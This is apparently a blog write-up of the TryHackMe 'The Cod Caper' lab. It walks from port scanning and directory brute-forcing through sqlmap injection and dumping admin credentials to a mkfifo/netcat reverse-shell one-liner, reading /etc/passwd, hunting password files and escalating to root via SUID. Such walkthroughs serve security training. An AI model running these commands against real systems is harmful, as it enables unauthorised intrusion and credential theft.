The Cod Caper — TryHackMe — Write Up
Hello. I’m Rahmos. Here is my The Cod Caper — TryHackMe — Write Up. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T4 -v <ip>
Now access the website as port 80 (HTTP) is opened. It’s a default Apache website. Use gobuster to scan for hidden dirs.
gobuster dir -u http://<ip> -w /path-to-wordlist
The hint told us to use big.txt, so let’s use that wordlist.
After the scan, we found /administrator.php
It’s a login page. Now use sqlmap (as recommended) to search for sql injection vuln.
sqlmap -u http://<ip>/administrator.php — forms — batch
*specify — batch flag will answer “yes” to all the question sqlmap asks you. You won’t need to press “Y” for every single question!
Then we know that there is a database named users. So let’s run sqlmap again to get all data in users
sqlmap -u http://<ip>/administrator.php — forms — batch -D users — dump
We’ve got the username and password of admin! Now login using the credential above.
Seems that we can execute command.
First ls to view files.
So there are 3 files in this directory. (/var/www/html).
On your machine, use nc to start a listener on port 1234:
nc -lvnp 1234
Now execute this cmd to spawn a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host-ip> 1234 >/tmp/f
Now you’ve got the shell.
cat /etc/passwd to find the other user.
Well he’s papa.
Then use find to search for ssh password
find / -name pass -type f 2>/dev/null
Now download the LinEnum.sh script and copy to the ssh machine using scp.
You can download the script here:
Now scp:
scp LinEnum.sh pingu@<ip>:/tmp
Enter the ssh password above and cd /tmp to execute the script
./LinEnum.sh -r report -e /tmp
You will find some interesting SUID files:
After that, run the pwndbg as instructed and get root! After that you can read content of the root.txt file.